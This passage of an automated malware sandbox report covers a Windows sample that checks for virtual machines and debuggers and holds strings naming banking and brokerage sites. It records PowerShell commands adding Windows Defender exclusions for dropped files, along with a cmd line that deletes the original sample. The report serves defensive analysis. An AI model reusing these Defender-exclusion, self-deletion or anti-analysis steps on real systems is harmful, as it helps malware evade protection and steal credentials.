                                Source: d3yngi1q.wji.exe, 00000002.00000002.1636177791.0000000001520000.00000004.08000000.00040000.00000000.sdmp, d3yngi1q.wji.exe, 00000002.00000002.1641016699.0000000002F41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hyper-v video
                                Source: dD82yUOZl5.27.drBinary or memory string: discord.comVMware20,11696494690f
                                Source: dD82yUOZl5.27.drBinary or memory string: AMC password management pageVMware20,11696494690
                                Source: dD82yUOZl5.27.drBinary or memory string: outlook.office.comVMware20,11696494690s
                                Source: dD82yUOZl5.27.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                                Source: dD82yUOZl5.27.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                                Source: dD82yUOZl5.27.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hyper-v
                                Source: dD82yUOZl5.27.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                                Source: dD82yUOZl5.27.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                                Source: dD82yUOZl5.27.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                                Source: dD82yUOZl5.27.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                                Source: dD82yUOZl5.27.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                                Source: d3yngi1q.wji.exe, 00000002.00000002.1673137245.000000001C37B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                Source: dD82yUOZl5.27.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                                Source: dD82yUOZl5.27.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                                Source: dD82yUOZl5.27.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                                Source: dD82yUOZl5.27.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                                Source: dD82yUOZl5.27.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.2983468368.000001907A61A000.00000004.00000020.00020000.00000000.sdmp, d3yngi1q.wji.exe, 00000002.00000002.1666409604.000000001B855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: dD82yUOZl5.27.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                                Source: dD82yUOZl5.27.drBinary or memory string: tasks.office.comVMware20,11696494690o
                                Source: dD82yUOZl5.27.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                                Source: d3yngi1q.wji.exe, 00000002.00000002.1673137245.000000001C37B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: d3yngi1q.wji.exe, 00000002.00000002.1641016699.0000000002F41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                                Source: dD82yUOZl5.27.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                                Source: d3yngi1q.wji.exe, 00000002.00000002.1673137245.000000001C37B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                Source: dD82yUOZl5.27.drBinary or memory string: dev.azure.comVMware20,11696494690j
                                Source: dD82yUOZl5.27.drBinary or memory string: global block list test formVMware20,11696494690
                                Source: dD82yUOZl5.27.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                                Source: dD82yUOZl5.27.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                                Source: dD82yUOZl5.27.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                                Source: dD82yUOZl5.27.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                                Source: dD82yUOZl5.27.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                                Source: dD82yUOZl5.27.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                                Source: dD82yUOZl5.27.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                                Source: dD82yUOZl5.27.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess information queried: ProcessInformationJump to behavior

                                Anti Debugging

                                barindex
                                Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeCode function: 2_2_00007FFB4B297D00 CheckRemoteDebuggerPresent,2_2_00007FFB4B297D00
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess queried: DebugPort
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\ProgramData\fontdrvhost.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\ProgramData\fontdrvhost.exeProcess token adjusted: Debug
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess token adjusted: Debug
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Adds a directory exclusion to Windows Defender
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe'
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'Jump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess created: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe "C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Wh2c6sgwRo.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.cmdline"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dmMZ8RlPbE.bat" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES459B.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCA62F8F92906C4C64B352C63DFBD9F59.TMP"Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4770.tmp" "c:\Windows\System32\CSC533681BDB06443E789816E6615DEB19.TMP"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe "C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeQueries volume information: C:\Users\user\Desktop\Wh2c6sgwRo.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeQueries volume information: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeQueries volume information: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe VolumeInformation
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeQueries volume information: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
